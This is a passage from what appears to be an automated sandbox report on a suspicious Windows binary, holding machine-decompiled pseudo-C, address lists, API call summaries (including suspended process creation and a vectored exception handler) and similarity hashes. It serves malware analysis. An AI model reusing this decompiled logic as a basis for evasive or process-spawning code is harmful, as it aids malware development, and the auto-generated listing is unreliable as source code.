				if(__eflags <= 0) {
					_t54 = 0x80070057;
					if(__eflags != 0) {
						 *_t43 = 0;
					}
					L14:
					_v220 = _t54;
					goto L18;
				}
				_v320 = _t63;
				 *_t79 = _t69;
				_t64 =  ~_t63;
				_t73 = 0;
				_t56 =  ~_t43;
				__eflags = 1;
				while(1) {
					_t74 =  *(_t79 + 0x6c + _t73 * 2) & 0x0000ffff;
					__eflags = _t74;
					if(_t74 == 0) {
						break;
					}
					_t43[_t73] = _t74;
					_t56 = _t56 + 0xfffffffe;
					_t22 = _t73 + 1; // 0x1
					_t75 = _t22;
					__eflags = _t64 + _t73 - 1;
					if(_t64 + _t73 == 1) {
						L10:
						__eflags = _t75 - _v320 - 2;
						_t62 =  ==  ? 0xfffffffe - _t56 :  ~_t56;
						 *((short*)( ==  ? 0xfffffffe - _t56 :  ~_t56)) = 0;
						_t54 = 0x8007007a;
						if(_t75 - _v320 == 2) {
							goto L14;
						}
						L16:
						_t65 =  &_v248;
						 *((intOrPtr*)(_t65 + 0x1c)) = 0;
						_t46 = CreateProcessW(0, _t43, 0, 0, 0, 4, 0, 0,  &_v316, _t65);
						__eflags = _t46;
						if(_t46 != 0) {
							 *_a4 = _v248;
							 *_a8 = _v244;
							_v232 = 1;
							 *((intOrPtr*)( *_t79 + 0x78)) = 1;
						}
						goto L18;
					}
					__eflags = _t73 - 0x7ffffffd;
					_t73 = _t75;
					if(__eflags != 0) {
						continue;
					}
					goto L10;
				}
				_t43[_t73] = 0;
				goto L16;
			}

0x005c744a
0x005c744c
0x005c7458
0x005c7464
0x005c746c
0x005c7479
0x005c747e
0x005c7481
0x005c7486
0x005c7488
0x005c7490
0x005c7491
0x005c749a
0x00000000
0x005c749c
0x005c749c
0x005c74a4
0x005c7592
0x005c7592
0x005c7596
0x005c7598
0x005c759b
0x005c75a0
0x005c75b1
0x005c75b1
0x005c749a
0x005c74b1
0x005c74b7
0x005c74bd
0x005c74c2
0x005c74c5
0x005c74c7
0x005c74cb
0x00000000
0x00000000
0x005c74d1
0x005c74d8
0x005c74da
0x005c7534
0x005c7539
0x005c753b
0x005c753b
0x005c7540
0x005c7540
0x00000000
0x005c7540
0x005c74de
0x005c74e2
0x005c74e5
0x005c74e7
0x005c74e9
0x005c74ed
0x005c74ee
0x005c74ee
0x005c74f3
0x005c74f6
0x00000000
0x00000000
0x005c74fb
0x005c74ff
0x005c7502
0x005c7502
0x005c7505
0x005c7507
0x005c7513
0x005c7520
0x005c7523
0x005c7526
0x005c752b
0x005c7530
0x00000000
0x00000000
0x005c754c
0x005c754c
0x005c7552
0x005c7564
0x005c756a
0x005c756c
0x005c7579
0x005c7586
0x005c758b
0x005c758f
0x005c758f
0x00000000
0x005c756c
0x005c7509
0x005c750f
0x005c7511
0x00000000
0x00000000
0x00000000
0x005c7511
0x005c7546
0x00000000

APIs

GetStartupInfoW.KERNEL32(?), ref: 005C746C
CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 005C7564

Strings

W, xrefs: 005C74A4

Memory Dump Source

Source File: 00000002.00000002.267364030.005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true

Associated: 00000002.00000002.267358206.005C0000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.267382270.005D8000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.267389405.005DA000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5c0000_______.jbxd

Similarity

API ID: CreateInfoProcessStartup
String ID: W
API String ID: 525363069-655174618
Opcode ID: f33617ca5d045c1202a2ac6fd20c20fb0003f2fb93ff844a0f801930e08f57bf
Instruction ID: 8ccaa8f9fea25133e4233da119c53364a4a4c34948646c1d35e4da9f149d6f76
Opcode Fuzzy Hash: f33617ca5d045c1202a2ac6fd20c20fb0003f2fb93ff844a0f801930e08f57bf
Instruction Fuzzy Hash: 3541BEB15083059FD728DF68D849B6BBBE9FF88310F108A1DE5968B390E675D904CF92

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: ??????.exe PID: 3448 Parent PID: 1512 ??????.exeCOMMON

Execution Graph

Execution Coverage:	7.8%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	21.4%
Total number of Nodes:	2000
Total number of Limit Nodes:	18

Executed Functions

Function 006F2370, Relevance: 20.1, APIs: 13, Instructions: 554
sleepthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 74%

			E006F2370(intOrPtr _a4) {
				char _v532;
				char _v536;
				char _v1052;
				long _v1056;
				short _v1060;
				struct _SECURITY_ATTRIBUTES* _v1068;
				struct _SECURITY_ATTRIBUTES* _v1072;
				char _v1076;
				int _v1080;
				intOrPtr _v1084;
				int _v1088;
				char _v1092;
				intOrPtr _v1096;
				int _v1100;
				signed int _v1104;
				signed int _v1108;
				int _v1112;
				signed int _v1116;
				signed int _v1120;
				long _t79;
				intOrPtr _t95;
				intOrPtr _t97;
				void* _t98;
				void* _t101;
				void* _t104;
				void* _t105;
				intOrPtr _t106;
				void* _t108;
				intOrPtr _t109;
				intOrPtr _t113;
				void* _t114;
				signed int _t119;
				signed int _t124;
				char* _t126;
				signed int _t130;
				void* _t132;
				signed int _t138;
				signed int _t139;
				signed int _t140;
				signed int _t141;
				signed int _t145;
				signed int _t146;
				char* _t149;
				signed int _t158;
				intOrPtr _t159;
				long _t161;
				signed int _t165;
				signed int _t171;
				void* _t174;
				signed int _t179;
				void* _t180;
				int* _t183;
				intOrPtr _t187;
				void* _t188;
				signed int _t194;
				long _t195;
				signed int _t198;
				void* _t199;
				char* _t201;
				void* _t202;
				void* _t206;
				signed int _t207;
				void* _t208;
				void* _t212;
				intOrPtr _t214;
				intOrPtr _t218;
				void* _t226;
				intOrPtr _t227;
				intOrPtr _t228;
				intOrPtr _t229;
				signed int _t230;
				intOrPtr _t231;
				signed int _t237;
				signed int _t239;
				signed int _t248;
				void* _t249;
				intOrPtr* _t250;
				int _t251;
				int _t252;
				intOrPtr _t254;
				void* _t255;
				signed int _t257;
				signed int _t264;
				void* _t266;
				void* _t268;
				void* _t270;
				void* _t272;
				void* _t273;
				void* _t275;
				void* _t278;
				intOrPtr _t287;
				void* _t294;

				_t266 = (_t264 & 0xfffffff8) - 0x450;
				_t203 =  &_v1092;
				E006E61D0( &_v1092);
				_t199 = 0x18721;
				_v1060 = 0;
				_v1076 = 0;
				_v1068 = 0;
				_v1072 = 0;
				do {
					SetLastError(0);
					GetModuleHandleW(0);
					_t79 = GetLastError();
					asm("adc dword [esp+0x34], 0x0");
					_t199 = _t199 - 1;
					_v1072 = _t79 + _v1072;
				} while (_t199 > 1);
				_t282 =  *0x6f9ab8;
				_v1116 = 0;
				_v1088 = 0;
				 *0x6f9ae0 =  &_v1092;
				if( *0x6f9ab8 != 0) {
					L9:
					_t82 =  *0x6f9ba0; // 0x0
					if(_t82 == 0) {
						L12:
						_t291 =  *0x6f9ab4;
						if( *0x6f9ab4 == 0) {
							_t180 = E006E5140(0x28);
							E006F43C0(_t180, _t237, _t291);
							 *0x6f9ab4 = _t180;
							E006EAB10();
							_t183 = E006E5140(0x1c);
							_t266 = _t266 + 8;
							_t203 = _t183;
							E006E31D0(_t183);
							 *0x6f9ac8 = _t183;
						}
						 *0x6f9ad0 = 0;
						_t247 = E006E61E0(1, 0);
						_t200 = E006E3180(_t85 + 0x100, 0);
						E006E61E0(1, _t87);
						_push(_t85);
						_push(_t87);
						_t82 = E006E9EE0(_t203);
						_t268 = _t266 + 0x10;
						if(_t82 == 0) {
							L107:
							E006F1FE0(_t82);
							L006F30B0();
							ExitProcess(0);
						} else {
							E006F6610(_t200, 0, _t247);
							E006E91E0(_t200);
							_t270 = _t268 + 0x10;
							_t248 = 8;
							while(1) {
								_push( *0x6f9ab4);
								_push( *0x6f9aa0);
								E006EC7C0();
								_t82 = E006F7770(_t237,  *0x6f9ab4, 0x6f9ac8);
								_t270 = _t270 + 0x10;
								if(_t82 != 0) {
									break;
								}
								Sleep(0x2710);
								_t18 = _t248 - 1; // 0x7
								_t179 = _t18;
								_t294 = _t248 + 1 - 1;
								_t248 = _t179;
								if(_t294 > 0) {
									continue;
								} else {
									_t82 = _t179 + 1;
									_t248 = _t179 + 1;
									break;
								}
							}
							if(_t248 == 0) {
								goto L107;
							} else {
								_t95 =  *0x6f9ac8; // 0x2fd440
								_t19 = _t95 + 8; // 0x3063a0
								E006F6750( *_t19);
								_t297 = _v1120;
								if(_v1120 == 0) {
									_t231 =  *0x6f9a94; // 0x2fd120
									E006F4980(_t231, _t297);
									CreateThread(0, 0, E006F3F50,  *0x6f9ab4, 0,  &_v1056); // executed
								}
								_t201 =  &_v532;
								_v1104 = 0;
								_v1108 = 0;
								while(1) {
									_t97 =  *0x6f9ac8; // 0x2fd440
									 *0x6f9b7c = 0;
									_t25 = _t97 + 0xc; // 0x3063b8
									_t98 = E006EC430( *_t25);
									_t299 = _t98;
									if(_t98 == 0) {
										goto L96;
									} else {
										_v1112 = 0;
										goto L86;
									}
									do {
										L86:
										_t109 =  *0x6f9ac8; // 0x2fd440
										_t60 = _t109 + 0xc; // 0x3063b8
										_t250 = E006E42F0( *_t60,  *0x6f9b7c);
										_t212 =  *0x6f9ab4; // 0x2ef510
										if(E006F6BD0(_t212, _t237, _t299,  *_t250,  *(_t110 + 4) & 0x0000ffff) == 0) {
											L89:
											_push(0x1f4);
											L93:
											Sleep();
											goto L94;
										}
										_v1120 = E006F4E70();
										_t301 = _v1120 -  *(_t250 + 8) - 0x3841;
										if(_v1120 -  *(_t250 + 8) < 0x3841) {
											L91:
											_t119 = E006E3C40( *0x6f9ab4,  &_v1076);
											_t270 = _t270 + 8;
											__eflags = _t119;
											if(_t119 == 0) {
												__eflags = _v1116;
												_t214 =  *0x6f9a94; // 0x2fd120
												 *((intOrPtr*)(_t214 + 0xc)) = _v1076;
												if(__eflags != 0) {
													E006E2230(__eflags,  *0x6f9ab4);
													_t270 = _t270 + 4;
												}
												E006F1960(__eflags,  *0x6f9ab4);
												_t272 = _t270 + 4;
												__eflags =  *0x6f9c54;
												if(__eflags == 0) {
													_t171 = E006E9200(__eflags,  *0x6f9ab4);
													_t272 = _t272 + 4;
													__eflags = _t171;
													if(_t171 != 0) {
														 *0x6f9c54 =  *0x6f9c54 + 1;
														__eflags =  *0x6f9c54;
													}
												}
												_v1084 = _t250;
												__eflags = _v1120 - _v1108 - 0xe11;
												if(_v1120 - _v1108 < 0xe11) {
													L41:
													_t124 = E006E5370();
													__eflags = _t124;
													if(_t124 < 0) {
														E006F4520(_t201, 0x46);
														_t273 = _t272 + 8;
														_push(0x48);
													} else {
														E006F4520(_t201, 0x46);
														_t273 = _t272 + 8;
														__eflags = _t124;
														if(_t124 == 0) {
															_push(0x47);
														} else {
															_push(0x49);
														}
													}
													_t126 =  &_v1052;
													_push(_t126);
													E006F4520();
													_push(_t126);
													E006F4610( *0x6f9ab4, 0xe, _t201);
													_t270 = _t273 + 0x18;
													_t254 = _v1084;
													_v1112 = _v1112 + 1;
													_t202 = 0;
													__eflags = 0;
													do {
														_v1120 = E006F4E70();
														__eflags =  *0x6f9abc;
														if( *0x6f9abc == 0) {
															_t161 = GetTickCount();
															__eflags = _t161 - _v1088;
															if(_t161 > _v1088) {
																_push(0);
																_push( *0x6f9ab4);
																_push( *0x6f9ac8);
																E006F3B90(_t237);
																_t270 = _t270 + 0xc;
																 *0x6f9abc = _v1120;
															}
														}
														_t130 =  *0x6f9b9c; // 0x2fd0d0
														__eflags =  *_t130 - 2;
														if( *_t130 == 2) {
															L52:
															_push( &_v1092);
															_push( *0x6f9ab4);
															_t132 = E006E7C50();
															_t270 = _t270 + 8;
															_t237 =  *0x6f9b9c; // 0x2fd0d0
															__eflags = _t132 - 1;
															 *((intOrPtr*)(_t237 + 0x10)) = _v1120 + 0xfffff8f8;
															if(_t132 == 1) {
																 *0x6f9b14 = 1;
															}
															goto L54;
														} else {
															_t40 = _t130 + 0x10; // 0x5db017f5
															__eflags = _v1120 -  *_t40 - 0x1519;
															if(_v1120 -  *_t40 < 0x1519) {
																L54:
																__eflags = _v1120 -  *0x6f9bec - 0x4b1;
																if(_v1120 -  *0x6f9bec < 0x4b1) {
																	L57:
																	__eflags = _v1120 -  *0x6f9ac4 - 0x7081;
																	if(_v1120 -  *0x6f9ac4 >= 0x7081) {
																		_t145 = E006EA170();
																		_t257 = _t145;
																		_push(_t145);
																		_t146 = E006E7A60();
																		E006F4520( &_v536, 0x4a);
																		_t275 = _t270 + 8;
																		__eflags = _t146;
																		if(_t146 == 0) {
																			_push(0x4b);
																		} else {
																			_push(0x4c);
																		}
																		_t149 =  &_v1052;
																		_push(_t149);
																		E006F4520();
																		_push(_t149);
																		E006F4610( *0x6f9ab4, 0xe,  &_v532);
																		_t270 = _t275 + 0x18;
																		__eflags = _t257;
																		if(_t257 != 0) {
																			E006E91E0(_t257);
																			_t270 = _t270 + 4;
																		}
																		 *0x6f9ac4 = E006F4E70();
																	}
																	_t218 =  *0x6f9a94; // 0x2fd120
																	_t82 = E006F0300(_t218, _t237);
																	__eflags = _t82;
																	if(_t82 == 0) {
																		goto L94;
																	} else {
																		__eflags =  *0x6f9abc;
																		if( *0x6f9abc == 0) {
																			L71:
																			__eflags =  *0x6f9b14;
																			if( *0x6f9b14 != 0) {
																				goto L107;
																			}
																			__eflags =  *0x6f9ad0;
																			if( *0x6f9ad0 != 0) {
																				 *0x6f9ad0 = 0;
																				_v1104 = 5;
																			}
																			_t239 = _v1104;
																			__eflags = _t239;
																			_t138 = 0 | __eflags <= 0x00000000;
																			_t237 = _t239 - (0 | __eflags > 0x00000000);
																			__eflags = _t237;
																			_t55 = _t138 * 8; // 0x1
																			_t255 = _t138 + _t55 + 1;
																			_v1104 = _t237;
																			while(1) {
																				Sleep(0x4e20);
																				__eflags = _t255 - 2;
																				if(_t255 < 2) {
																					goto L77;
																				}
																				_t139 =  *0x6f9ad0; // 0x0
																				_t255 = _t255 - 1;
																				__eflags = _t139;
																				if(_t139 == 0) {
																					continue;
																				}
																				goto L77;
																			}
																			goto L77;
																		}
																		_push(1);
																		_push( *0x6f9ab4);
																		_t140 = E006F4610();
																		_t270 = _t270 + 8;
																		__eflags = _t140;
																		if(_t140 == 0) {
																			goto L94;
																		}
																		_t141 = E006EA180( *0x6f9ab4);
																		_t270 = _t270 + 4;
																		__eflags = _t141;
																		if(_t141 == 0) {
																			_t82 =  *0x6f9b14; // 0x0
																			_t226 = 0xf;
																			__eflags = _t82;
																			if(_t82 != 0) {
																				_t226 = 4;
																			}
																			__eflags = _t226 - 0xc;
																			if(_t226 == 0xc) {
																				goto L94;
																			} else {
																				__eflags = _t226 - 0xf;
																				if(_t226 == 0xf) {
																					goto L94;
																				}
																				__eflags = _t82;
																				if(_t82 == 0) {
																					goto L94;
																				}
																				goto L107;
																			}
																		}
																		_t227 =  *0x6f9a94; // 0x2fd120
																		__eflags = E006F2F10(_t227);
																		if(__eflags != 0) {
																			_t229 =  *0x6f9a94; // 0x2fd120
																			E006F73C0(_t229, _t142);
																			E006E91E0(_t142);
																			_t270 = _t270 + 4;
																		}
																		_t228 =  *0x6f9a94; // 0x2fd120
																		_t82 = E006E77E0(_t228, __eflags);
																		goto L71;
																	}
																}
																__eflags = _v1120 -  *((intOrPtr*)(_t254 + 0xc)) - 0x3841;
																if(_v1120 -  *((intOrPtr*)(_t254 + 0xc)) < 0x3841) {
																	goto L57;
																}
																 *0x6f9bec = _v1120;
																_t158 = E006E9060( *0x6f9ab4, 0x6f9ac8);
																_t270 = _t270 + 8;
																__eflags = _t158;
																if(_t158 != 0) {
																	_t159 =  *0x6f9ac8; // 0x2fd440
																	_t59 = _t159 + 8; // 0x3063a0
																	E006F6750( *_t59);
																	 *0x6f9b7c = 0;
																	goto L94;
																}
																goto L57;
															}
															goto L52;
														}
														L77:
														_t254 = _v1084;
														_t202 = _t202 + 1;
														__eflags = _t202 - 0x64;
													} while (_t202 < 0x64);
													goto L94;
												} else {
													_t165 =  *0x6f9bf8; // 0x3
													__eflags = _t165;
													if(_t165 <= 0) {
														E006E2DA0();
														_t165 =  *0x6f9bf8; // 0x3
													}
													__eflags = _v1108;
													if(_v1108 != 0) {
														__eflags = _t165;
														if(_t165 > 0) {
															_t230 =  *0x6f9c40; // 0x2f8988
															__eflags = _t230;
															if(_t230 != 0) {
																_push(_t230);
																E006E3200();
																_t272 = _t272 + 4;
																_t165 =  *0x6f9bf8; // 0x3
															}
														}
													}
													__eflags = _t165;
													if(_t165 < 0) {
														L39:
														E006E80F0( *0x6f9ab4);
														_t272 = _t272 + 4;
														goto L40;
													} else {
														__eflags = (_t165 | 0x00000001) - 3;
														if((_t165 | 0x00000001) != 3) {
															L40:
															_v1108 = _v1120;
															goto L41;
														}
														goto L39;
													}
												}
											}
											_push(0x3e8);
											goto L93;
										}
										_t174 = E006E5960(_t301,  *0x6f9ab4,  &_v1060);
										_t270 = _t270 + 8;
										if(_t174 == 0) {
											 *(_t250 + 8) = _v1120;
											goto L91;
										}
										goto L89;
										L94:
										_t251 =  *0x6f9b7c; // 0x0
										_t113 =  *0x6f9ac8; // 0x2fd440
										_t252 = _t251 + 1;
										 *0x6f9b7c = _t252;
										_t66 = _t113 + 0xc; // 0x3063b8
										_t114 = E006EC430( *_t66);
										_t201 =  &_v532;
									} while (_t252 < _t114);
									L97:
									_t206 =  *0x6f9ab4; // 0x2ef510
									_v1100 = 0;
									_t249 = E006E1B50(_t206,  &_v1100);
									_push( *0x6f9ab4);
									_push( *0x6f9aa0);
									_t101 = E006EC7C0();
									_t270 = _t270 + 8;
									_t207 = 1;
									if(_t101 == 0) {
										L103:
										if(_v1112 == 0) {
											_t311 = _t207;
											if(_t207 != 0) {
												_push( *0x6f9ab4);
												E006EAB60(_t237, _t311);
												_t270 = _t270 + 4;
											}
										}
										continue;
									}
									_t208 =  *0x6f9ab4; // 0x2ef510
									_v1080 = 0;
									_t104 = E006E1B50(_t208,  &_v1080);
									_t207 = 1;
									if(_t104 == 0) {
										goto L103;
									}
									_t209 = _v1100;
									if(_v1100 != _v1080) {
										L101:
										_t105 = E006F7770(_t237,  *0x6f9ab4, 0x6f9ac8);
										_t270 = _t270 + 8;
										_t207 = 1;
										if(_t105 == 3) {
											_t106 =  *0x6f9ac8; // 0x2fd440
											_t75 = _t106 + 8; // 0x3063a0
											E006F6750( *_t75);
											_t207 = 0;
										}
										goto L103;
									}
									_t108 = E006F7D20(_t249, _t104, _t209);
									_t270 = _t270 + 0xc;
									_t207 = 1;
									if(_t108 != 0) {
										goto L103;
									}
									goto L101;
									L96:
									_v1112 = 0;
									goto L97;
								}
							}
						}
					}
					if(_t82 > 2) {
						goto L107;
					} else {
						_v1116 = 1;
						goto L12;
					}
				}
				_t187 =  *0x6f9cf4(0, E006E58F0); // executed
				_t203 =  &_v1100;
				 *0x6f9ab8 = _t187;
				 *0x6f9bf0 = 1;
				_t188 = E006E7340( &_v1100);
				 *0x6f9ae8 = E006E3A80();
				_v1060 = 0;
				_push(0x6f9c40);
				_push(0x6f9aa0);
				_push(_a4);
				E006E3EC0(_t237, _t282);
				_t278 = _t266 + 0xc;
				SetCurrentDirectoryW( *0x6f9aa0); // executed
				if(_t188 != 0) {
					_t82 = E006E18E0(_t237, __eflags,  *0x6f9aa0);
					goto L107;
				}
				 *0x6f9ab4 = 0;
				E006F2D90();
				if(E006E2DA0() == 0) {
					L7:
					_t194 = E006E3180(0x1c, 0);
					_t266 = _t278 + 8;
					 *0x6f9b9c = _t194;
					 *((intOrPtr*)(_t194 + 0x10)) = 0;
					_t195 = GetTickCount();
					_t287 =  *0x6f9c04; // 0x0
					 *0x6f9ac4 = 0;
					 *0x6f9bec = 0;
					 *0x6f9c54 = 0;
					_v1096 = _t195 + 0x1d4c0;
					if(_t287 == 0) {
						 *0x6f9c04 = E006F1690();
					}
					goto L9;
				}
				_t198 =  *0x6f9c40; // 0x2f8988
				if(_t198 == 0) {
					goto L7;
				}
				_push(_t198); // executed
				_t82 = E006E3200(); // executed
				_t278 = _t278 + 4;
				if(_t82 == 0) {
					goto L107;
				}
				goto L7;
			}

0x006f2379
0x006f237f
0x006f2383
0x006f2390
0x006f2395
0x006f2399
0x006f239d
0x006f23a1
0x006f23a5
0x006f23a6
0x006f23ad
0x006f23b3
0x006f23b9
0x006f23be
0x006f23bf
0x006f23c3
0x006f23c8
0x006f23d3
0x006f23db
0x006f23e3
0x006f23e8
0x006f24c9
0x006f24c9
0x006f24d0
0x006f24e2
0x006f24e2
0x006f24e9
0x006f24ed
0x006f24f9
0x006f2504
0x006f250a
0x006f2511
0x006f2516
0x006f2519
0x006f251d
0x006f2522
0x006f2522
0x006f252c
0x006f253a
0x006f254c
0x006f2553
0x006f2558
0x006f2559
0x006f255a
0x006f255f
0x006f2564
0x006f2b8a
0x006f2b8a
0x006f2b8f
0x006f2b96
0x006f256a
0x006f256e
0x006f2577
0x006f257c
0x006f2585
0x006f258a
0x006f258a
0x006f2590
0x006f2596
0x006f25a9
0x006f25ae
0x006f25b3
0x00000000
0x00000000
0x006f25ba
0x006f25bc
0x006f25bc
0x006f25c3
0x006f25c5
0x006f25c7
0x00000000
0x006f25c9
0x006f25c9
0x006f25ca
0x00000000
0x006f25ca
0x006f25c7
0x006f25ce
0x00000000
0x006f25d4
0x006f25d4
0x006f25df
0x006f25e2
0x006f25e7
0x006f25ec
0x006f25ee
0x006f25f4
0x006f260e
0x006f260e
0x006f2614
0x006f261b
0x006f2623
0x006f262b
0x006f262b
0x006f2630
0x006f263a
0x006f263d
0x006f2642
0x006f2644
0x00000000
0x006f264a
0x006f264a
0x006f2652
0x006f2652
0x006f29f5
0x006f29f5
0x006f29f5
0x006f29fa
0x006f2a08
0x006f2a0e
0x006f2a1e
0x006f2a4c
0x006f2a4c
0x006f2a79
0x006f2a79
0x00000000
0x006f2a79
0x006f2a25
0x006f2a2e
0x006f2a33
0x006f2a59
0x006f2a64
0x006f2a69
0x006f2a6c
0x006f2a6e
0x006f2657
0x006f2660
0x006f2666
0x006f2669
0x006f2671
0x006f2676
0x006f2676
0x006f267f
0x006f2684
0x006f2687
0x006f268e
0x006f2696
0x006f269b
0x006f269e
0x006f26a0
0x006f26a2
0x006f26a2
0x006f26a2
0x006f26a0
0x006f26ab
0x006f26b3
0x006f26b8
0x006f2711
0x006f2715
0x006f271a
0x006f271c
0x006f2736
0x006f273b
0x006f273e
0x006f271e
0x006f2723
0x006f2728
0x006f272b
0x006f272d
0x006f2742
0x006f272f
0x006f272f
0x006f272f
0x006f272d
0x006f2744
0x006f274a
0x006f274b
0x006f2753
0x006f275d
0x006f2762
0x006f2765
0x006f2769
0x006f276d
0x006f276d
0x006f276f
0x006f2774
0x006f2777
0x006f277e
0x006f2780
0x006f2786
0x006f278a
0x006f278c
0x006f278e
0x006f2794
0x006f279a
0x006f279f
0x006f27a5
0x006f27a5
0x006f278a
0x006f27aa
0x006f27af
0x006f27b2
0x006f27c2
0x006f27c6
0x006f27c7
0x006f27cd
0x006f27d2
0x006f27df
0x006f27e5
0x006f27e8
0x006f27eb
0x006f27ed
0x006f27ed
0x00000000
0x006f27b4
0x006f27b7
0x006f27ba
0x006f27c0
0x006f27f7
0x006f2800
0x006f2805
0x006f2837
0x006f2840
0x006f2845
0x006f284d
0x006f2852
0x006f2858
0x006f2859
0x006f286a
0x006f286f
0x006f2872
0x006f2874
0x006f287a
0x006f2876
0x006f2876
0x006f2876
0x006f287c
0x006f2882
0x006f2883
0x006f288b
0x006f289c
0x006f28a1
0x006f28aa
0x006f28ac
0x006f28af
0x006f28b4
0x006f28b4
0x006f28bc
0x006f28bc
0x006f28c1
0x006f28c7
0x006f28cc
0x006f28ce
0x00000000
0x006f28d4
0x006f28d4
0x006f28db
0x006f293c
0x006f293c
0x006f2943
0x00000000
0x00000000
0x006f2949
0x006f2950
0x006f2952
0x006f295c
0x006f295c
0x006f2964
0x006f296c
0x006f296e
0x006f2974
0x006f2974
0x006f2976
0x006f2976
0x006f297a
0x006f297e
0x006f2983
0x006f2985
0x006f2988
0x00000000
0x00000000
0x006f298a
0x006f298f
0x006f2990
0x006f2992
0x00000000
0x00000000
0x00000000
0x006f2992
0x00000000
0x006f297e
0x006f28dd
0x006f28df
0x006f28e5
0x006f28ea
0x006f28ed
0x006f28ef
0x00000000
0x00000000
0x006f28fb
0x006f2900
0x006f2903
0x006f2905
0x006f29a7
0x006f29ac
0x006f29ae
0x006f29b0
0x006f29b2
0x006f29b2
0x006f29b4
0x006f29b7
0x00000000
0x006f29bd
0x006f29bd
0x006f29c0
0x00000000
0x00000000
0x006f29c6
0x006f29c8
0x00000000
0x00000000
0x00000000
0x006f29ce
0x006f29b7
0x006f290b
0x006f2916
0x006f2918
0x006f291a
0x006f2923
0x006f2929
0x006f292e
0x006f292e
0x006f2931
0x006f2937
0x00000000
0x006f2937
0x006f28ce
0x006f280d
0x006f2812
0x00000000
0x00000000
0x006f2817
0x006f2827
0x006f282c
0x006f282f
0x006f2831
0x006f29d3
0x006f29de
0x006f29e1
0x006f29e6
0x00000000
0x006f29e6
0x00000000
0x006f2831
0x00000000
0x006f27c0
0x006f2994
0x006f2994
0x006f2998
0x006f2999
0x006f2999
0x00000000
0x006f26ba
0x006f26ba
0x006f26bf
0x006f26c1
0x006f26c3
0x006f26c8
0x006f26c8
0x006f26cd
0x006f26d2
0x006f26d4
0x006f26d6
0x006f26d8
0x006f26de
0x006f26e0
0x006f26e2
0x006f26e3
0x006f26e8
0x006f26eb
0x006f26eb
0x006f26e0
0x006f26d6
0x006f26f0
0x006f26f2
0x006f26fc
0x006f2702
0x006f2707
0x00000000
0x006f26f4
0x006f26f7
0x006f26fa
0x006f270a
0x006f270d
0x00000000
0x006f270d
0x00000000
0x006f26fa
0x006f26f2
0x006f26b8
0x006f2a74
0x00000000
0x006f2a74
0x006f2a40
0x006f2a45
0x006f2a4a
0x006f2a56
0x00000000
0x006f2a56
0x00000000
0x006f2a7b
0x006f2a7b
0x006f2a81
0x006f2a86
0x006f2a87
0x006f2a8d
0x006f2a90
0x006f2a97
0x006f2a97
0x006f2aae
0x006f2aae
0x006f2ab8
0x006f2ac6
0x006f2ac8
0x006f2ace
0x006f2ad4
0x006f2ad9
0x006f2ade
0x006f2ae3
0x006f2b56
0x006f2b5b
0x006f2b61
0x006f2b63
0x006f2b69
0x006f2b6f
0x006f2b74
0x006f2b74
0x006f2b63
0x00000000
0x006f2b5b
0x006f2ae5
0x006f2aef
0x006f2af8
0x006f2aff
0x006f2b04
0x00000000
0x00000000
0x006f2b06
0x006f2b0e
0x006f2b24
0x006f2b2f
0x006f2b34
0x006f2b3a
0x006f2b3f
0x006f2b47
0x006f2b4c
0x006f2b4f
0x006f2b54
0x006f2b54
0x00000000
0x006f2b3f
0x006f2b13
0x006f2b18
0x006f2b1d
0x006f2b22
0x00000000
0x00000000
0x00000000
0x006f2aa6
0x006f2aa6
0x00000000
0x006f2aa6
0x006f262b
0x006f25ce
0x006f2564
0x006f24d5
0x00000000
0x006f24db
0x006f24de
0x00000000
0x006f24de
0x006f24d5
0x006f23f5
0x006f23fb
0x006f23ff
0x006f2404
0x006f240e
0x006f241a
0x006f241f
0x006f2426
0x006f242b
0x006f2430
0x006f2433
0x006f2438
0x006f2441
0x006f2449
0x006f2b82
0x00000000
0x006f2b87
0x006f244f
0x006f2459
0x006f2465
0x006f2481
0x006f2486
0x006f248b
0x006f248e
0x006f2493
0x006f2496
0x006f24a1
0x006f24a7
0x006f24ad
0x006f24b3
0x006f24b9
0x006f24bd
0x006f24c4
0x006f24c4
0x00000000
0x006f24bd
0x006f2467
0x006f246e
0x00000000
0x00000000
0x006f2470
0x006f2471
0x006f2476
0x006f247b
0x00000000
0x00000000
0x00000000

APIs

SetLastError.KERNEL32(00000000), ref: 006F23A6
GetModuleHandleW.KERNEL32(00000000), ref: 006F23AD
GetLastError.KERNEL32 ref: 006F23B3
RtlAddVectoredExceptionHandler.NTDLL(00000000,006E58F0), ref: 006F23F5
SetCurrentDirectoryW.KERNELBASE ref: 006F2441
GetTickCount.KERNEL32 ref: 006F2496
Sleep.KERNEL32(00002710,?,?,?,?,?,?,?,?,00000001,00000000), ref: 006F25BA
CreateThread.KERNELBASE(00000000,00000000,006F3F50,00000000,?), ref: 006F260E
GetTickCount.KERNEL32 ref: 006F2780
Sleep.KERNEL32(00004E20), ref: 006F2983
Sleep.KERNEL32(000001F4,00000000,?), ref: 006F2A79
CoUninitialize.OLE32 ref: 006F2B8F
ExitProcess.KERNEL32 ref: 006F2B96

Part of subcall function 006E91E0: RtlFreeHeap.NTDLL(00000008,?,006E9F64), ref: 006E91F1

Memory Dump Source

Source File: 00000003.00000002.541878315.006E1000.00000020.00000001.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000003.00000002.541873241.006E0000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.541894547.006F8000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.541901024.006FA000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6e0000_______.jbxd

Similarity

API ID: Sleep$CountErrorLastTick$CreateCurrentDirectoryExceptionExitFreeHandleHandlerHeapModuleProcessThreadUninitializeVectored
String ID:
API String ID: 1891522815-0
Opcode ID: 97b5a4a0d7caab72734cc0016cbd043fe625b784332357eb7cb6194f766dc14b
Instruction ID: 27a01fe040ae2ce9246b5c8f3a3956cfc576b87b38f782083914c89e8fe9c395
Opcode Fuzzy Hash: 97b5a4a0d7caab72734cc0016cbd043fe625b784332357eb7cb6194f766dc14b
